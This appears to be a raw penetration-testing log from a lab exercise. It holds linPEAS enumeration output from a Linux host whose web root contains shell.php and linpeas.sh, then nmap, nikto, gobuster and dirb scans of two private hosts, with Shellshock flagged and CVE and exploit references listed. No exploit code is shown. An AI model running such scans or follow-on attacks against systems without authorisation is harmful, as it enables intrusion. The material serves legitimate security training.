-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Jul 21 2020 /usr/bin/su
-rwsr-xr-x 1 root root 31K May 26 2021 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 15K Jan 29 2020 /usr/lib/mc/cons.saver
-rwxr-sr-x 1 root shadow 83K May 28 2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Jul 21 2020 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 343K Mar 9 2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K May 28 2020 /usr/bin/expiry
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3222 Mar 11 2020 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man
-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-20+22:19:01.0447607530 /var/www/html/linpeas.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-screen.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-ksconfig.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-bashrc.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/search-ubuntu-item.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/clean-vm-ubuntu.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/calc-ipaddr.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_terminal.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_keyboard.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in root
/swapfile
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 24
drwxr-xr-x 2 root root 4096 Jul 10 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 2 root root 339 Jul 10 2021 add-bashrc.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/html
/var/www/html/index.php
/var/www/html/index.html
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/syslog
/var/log/journal/0291f50a03464de4ba0dcf51a3f92c75/system.journal
/var/log/vsftpd.log
/var/log/auth.log
/var/log/kern.log
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
/home/vmadmin/.bash_logout
/home/vmadmin/.hushlogin
/home/vmadmin/.selected_editor
/home/vmadmin/.sudo_as_admin_successful
/home/vmadmin/.bashrc
/home/vmadmin/.bash_history
/home/vmadmin/bashrc.tmp
/home/vmadmin/.profile
/var/www/html/index.php
/var/www/html/linpeas.sh
/var/www/html/index.html
/var/www/html/shell.php
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 568 Sep 13 2021 /usr/local/smartlearn/bin/ksconfig.bak
-rw-r--r-- 1 root root 2544 Jul 22 2020 /usr/share/help-langpack/en_GB/evolution/backup-restore.page
-rw-r--r-- 1 root root 1059 Jun 16 2020 /usr/share/help-langpack/en_GB/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 840 Jun 16 2020 /usr/share/help-langpack/en_GB/deja-dup/backup-first.page
-rw-r--r-- 1 root root 1059 Jun 16 2020 /usr/share/help-langpack/en_AU/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 840 Jun 16 2020 /usr/share/help-langpack/en_AU/deja-dup/backup-first.page
-rw-r--r-- 1 root root 11401 Jul 10 2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 9073 May 8 2021 /usr/lib/modules/5.4.0-74-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 May 8 2021 /usr/lib/modules/5.4.0-74-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 44048 Mar 17 2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-74/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237862 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/.config.old
-rw-r--r-- 1 root root 0 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/include/config/wm831x/backup.h
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Sep 13 2021 .
drwxr-xr-x 12 root root 4.0K Sep 13 2021 ..
drwxrwxrwx 2 root root 4.0K Nov 20 22:19 html
/var/www/html:
total 836K
drwxrwxrwx 2 root root 4.0K Nov 20 22:19 .
drwxr-xr-x 3 root root 4.0K Sep 13 2021 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Jun 27 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 vmadmin vmadmin 220 Jun 27 2020 /home/vmadmin/.bash_logout
-rw-rw-r-- 1 vmadmin vmadmin 0 Jun 27 2020 /home/vmadmin/.hushlogin
-rw-rw-r-- 1 vmadmin vmadmin 66 Jun 3 2021 /home/vmadmin/.selected_editor
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 501 May 4 2021 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 172 Sep 13 2021 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.6.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 7528 Sep 13 2021 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.4.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.5.gz
-rw-r--r-- 1 root root 101410 Sep 7 2020 /var/backups/dpkg.status.4.gz
-rw-r--r-- 1 root root 746 Jul 10 2021 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 11 Jun 27 2020 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 480 Sep 7 2020 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 2243 Apr 14 2021 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 106784 Jun 3 2021 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 490 May 4 2021 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 2235 Jul 7 2020 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 356 Sep 13 2021 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 491071 Sep 13 2021 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 105217 Jul 2 2020 /var/backups/dpkg.status.6.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 101862 Apr 21 2021 /var/backups/dpkg.status.3.gz
-rw-r--r-- 1 root root 658 Jun 3 2021 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 2251 May 4 2021 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 105476 Jul 6 2020 /var/backups/dpkg.status.5.gz
-rw-r--r-- 1 root root 2053 Jun 30 2020 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 101735 May 4 2021 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 51200 Sep 14 2021 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 811 Sep 13 2021 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.3.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.3.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/issue
/etc/issue.dpkg-dist
/etc/motd
/run/lock
/run/lock/apache2
/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html
/var/www/html/linpeas.sh
/var/www/html/shell.php
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/help-langpack/en_GB/empathy/irc-nick-password.page
/usr/share/help-langpack/en_GB/evince/password.page
/usr/share/help-langpack/en_GB/zenity/password.page
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
[ 1.799147] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[ 1.799166] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 2.293006] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[ 2.293090] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.135 -oA machines/192_168_110_135/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:44 CET
Nmap scan report for 192.168.110.135
Host is up (0.0017s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.87 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.135 -oA machines/192_168_110_135/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Nmap scan report for 192.168.110.135
Host is up (0.00080s latency).
All 1000 scanned ports on 192.168.110.135 are closed (937) or open|filtered (63)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1011.70 seconds
nikto -h 192.168.110.135
---------------------------------------------------------------------------
+ Target IP: 192.168.110.135
+ Target Hostname: 192.168.110.135
+ Target Port: 80
+ Start Time: 2022-12-11 07:11:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 4d0, size: 5cbedd7725b09, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-112004: /cgi-bin/printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ 8727 requests: 2 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-12-11 07:11:40 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.135 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:12:24 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/cgi-bin/ (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 1232]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/12/11 07:12:25 Finished
===============================================================
dirb http://192.168.110.135 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:13:10 2022
URL_BASE: http://192.168.110.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.135/ ----
+ http://192.168.110.135/index.html (CODE:200|SIZE:1232)
-----------------
END_TIME: Sun Dec 11 07:13:13 2022
DOWNLOADED: 9224 - FOUND: 1
sudo nmap 192.168.110.135 -sV -oA 192_168_110_135/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.135
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.54 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.144 -oA machines/192_168_110_144/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 11:48 CET
Nmap scan report for 192.168.110.144
Host is up (0.00066s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.70 seconds
nikto -h 192.168.110.144:5357
---------------------------------------------------------------------------
+ Target IP: 192.168.110.144
+ Target Hostname: 192.168.110.144
+ Target Port: 5357
+ Start Time: 2022-12-11 07:16:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7916 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-12-11 07:18:27 (GMT1) (139 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.110.144:5357 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:16:16 2022
URL_BASE: http://192.168.110.144:5357/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.144:5357/ ----
-----------------
END_TIME: Sun Dec 11 07:18:26 2022
DOWNLOADED: 9224 - FOUND: 0
sudo nmap 192.168.110.144 -sV -oA 192_168_110_144/enumeration/nmap/vuln --script vuln -T5 -p135,139,445,5357,49664-49668,49670,49672
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:23 CET
Nmap scan report for 192.168.110.144
Host is up (0.00093s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
